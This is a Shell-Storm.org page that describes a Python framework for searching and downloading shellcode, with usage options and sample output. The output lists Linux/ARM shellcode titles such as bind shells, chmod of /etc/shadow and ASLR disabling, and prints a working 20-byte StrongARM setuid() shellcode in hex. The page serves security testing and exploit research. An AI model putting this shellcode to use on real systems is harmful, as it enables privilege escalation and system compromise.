[ Shell-Storm.org ] | Project | Framework
Search Shellcodes   
   
      
    Home | Project | Shellcodes | Research | Papers | Search | WarGame | Repo | Network

 

 Shell-Storm.org is a development organization based on GNU/Linux systems 
 that provide free projects and source codes.

 Shell-storm.org provides useful information to people who perform security testing.



 Shell-Storm FramWork
 ====================

 Download http://www.shell-storm.org/project/framework/files/



 Usage
 ======


 Usage : framework.py  <option> <argument>

 Option: -ss  <word>       Search shellcode with filtre
         -su  <word>       Search utility with filtre
         -sp  <word>       Search paper with filtre
         -ds  <ID> {down}  Display shellcode. Set down for download source
         -du  <ID> {down}  Display utility. Set down for download source
         -dp  <ID>         Download paper
         -md5 <word>       Try to decrypte hash md5
         -up               Upgrade framework



 How to search shellcode
 =======================


  jonathan@ArchLinux [201010] $ ./framework-201011.py -ss arm

   [+] Shell-storm.org Framework 201011
   [+] Search shellcode:  arm

   [+] 17 shellcodes found

   ID	  System	  Title
   -------------------------------------------------------------------------

   [666]  [Linux/ARM]	  setuid(0) & execve(/bin/sh, /bin/sh, 0) - 38 bytes
   [668]  [Linux/ARM]	  chmod(/etc/shadow, 0777) Shellcode - 35 Bytes
   [727]  [Linux/ARM]	  ifconfig eth0 and Assign Address
   [670]  [Linux/ARM]	  polymorphic chmod(/etc/shadow, 0777) - 84 Bytes
   [665]  [Linux/ARM]	  execve(/bin/sh, /bin/sh, 0) - 30 bytes
   [659]  [Linux/StrgARM] execve() - 47 bytes
   [661]  [Linux/StrgARM] bind() portshell - 203 bytes
   [660]  [Linux/StrgARM] setuid() - 20 bytes
   [671]  [Linux/ARM]	  Polymorphic execve("/bin/sh", ["/bin/sh"], NULL); - XOR 88 encoded - 78 bytes
   [696]  [Linux/ARM]	  execve(/bin/sh,NULL,0) - 31 bytes
   [669]  [Linux/ARM]	  Disable ASLR Security - 102 bytes
   [729]  [Linux/ARM]	  Bind Connect UDP Port 68
   [698]  [Linux/ARM]	  execve(/bin/sh, [0], [0 vars]) - 27 bytes
   [667]  [Linux/ARM]	  Kill all processes (with/without _setuid) - 28 bytes
   [730]  [Linux/ARM]	  Bindshell port 0x1337
   [694]  [Linux/ARM]	  Linux Execute Command (MSF)
   [728]  [Linux/ARM]	  Loader Port 0x1337

 

 How to Display shellcode
 =========================


 jonathan@ArchLinux [v4]$ python framework-201011.py -ds 660

  [+] Shell-storm.org Framework 201011
  [+] shellcode ID:  660

  Title: StrongARM - setuid() - 20 bytes


 /*
  * 20 byte StrongARM/Linux setuid() shellcode
  * funkysh
  */

 char shellcode[]= "\x02\x20\x42\xe0"   /*  sub   r2, r2, r2            */
                   "\x04\x10\x8f\xe2"   /*  add   r1, pc, #4            */
                   "\x12\x02\xa0\xe1"   /*  mov   r0, r2, lsl r2        */
                   "\x01\x20\xc1\xe5"   /*  strb  r2, [r1, #1]          */
                   "\x17\x0b\x90\xef";  /*  swi   0x90ff17              */



 Framework Screenshots
 ======================



 









 
 Links :
          Others DNS :
  
   Nuit Du Hack  Sysdream  ZeroScience      DNS 1
   Acissi  StalkR's Blog  Peter Van Eeckhoutte's Blog      DNS 2
   Shatter's blog  Nibbles microblog  Ghosts In The Stack      DNS 3
   W4kfu's bl0g  0vercl0k's blog  Ivanlef0u's blog      DNS 4
   falken's blog  Mysterie's blog  Sh4ka's Blog      DNS 5
   Sm0k's blog  m_101's blog  Graland Security    
 
  [ @JonathanSalwan ] Shell-Storm Network - 2008-2012